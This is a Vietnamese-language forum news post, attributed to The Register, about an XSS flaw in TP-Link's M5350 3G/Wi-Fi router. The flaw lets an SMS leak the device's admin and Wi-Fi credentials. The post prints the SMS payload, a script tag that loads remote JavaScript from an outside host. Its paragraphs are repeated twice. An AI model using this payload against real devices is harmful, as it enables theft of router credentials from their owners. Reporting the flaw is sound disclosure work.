WhiteHat News #ID:0911
VIP Members
-
30/07/2014
-
79
-
711 bài viết
Modem 3G/Wi-Fi của TP-Link làm lộ thông tin quan trọng do tin nhắn văn bản độc hại
Bộ định tuyến 3G/Wi-Fi M5350 của TP-Link chứa lỗ hổng khiến giới an ninh mạng lo sợ.
Thông tin đăng nhập quản trị viên của thiết bị có thể bị lấy đi từ một số tính năng đáng lẽ nên được xóa đi sau khi sử dụng bằng tin nhắn văn bản.
Bên phát hiện ra lỗi, công ty Securai của Đức, cho biết đây là một lỗi XSS (cross-site scripting) có thể bị khai thác bằng 1 tin nhắn SMS có chứa đoạn script:
<Script src = // n.ms/a.js> </ script>
Thiết bị nhận được tin nhắn sẽ trả lời cùng các thông tin như tên người dùng quản trị, mật khẩu quản trị, SSID và mật khẩu đăng nhập thiết bị.
Jan Hörsch đến từ Securai cho biết ông tìm ra lỗi bằng cách phân tích firmware của modem.
Có vẻ lỗ hổng này vẫn chưa được vá vì theo trang tải phần mềm hiện tại của TP-Link cho M5350, phiên bản hiện tại là M5350_V2_140115, được phát hành từ tháng 1/2015.
Thông tin đăng nhập quản trị viên của thiết bị có thể bị lấy đi từ một số tính năng đáng lẽ nên được xóa đi sau khi sử dụng bằng tin nhắn văn bản.
Bên phát hiện ra lỗi, công ty Securai của Đức, cho biết đây là một lỗi XSS (cross-site scripting) có thể bị khai thác bằng 1 tin nhắn SMS có chứa đoạn script:
<Script src = // n.ms/a.js> </ script>
Thiết bị nhận được tin nhắn sẽ trả lời cùng các thông tin như tên người dùng quản trị, mật khẩu quản trị, SSID và mật khẩu đăng nhập thiết bị.
Jan Hörsch đến từ Securai cho biết ông tìm ra lỗi bằng cách phân tích firmware của modem.
Có vẻ lỗ hổng này vẫn chưa được vá vì theo trang tải phần mềm hiện tại của TP-Link cho M5350, phiên bản hiện tại là M5350_V2_140115, được phát hành từ tháng 1/2015.
Nguồn: The Register
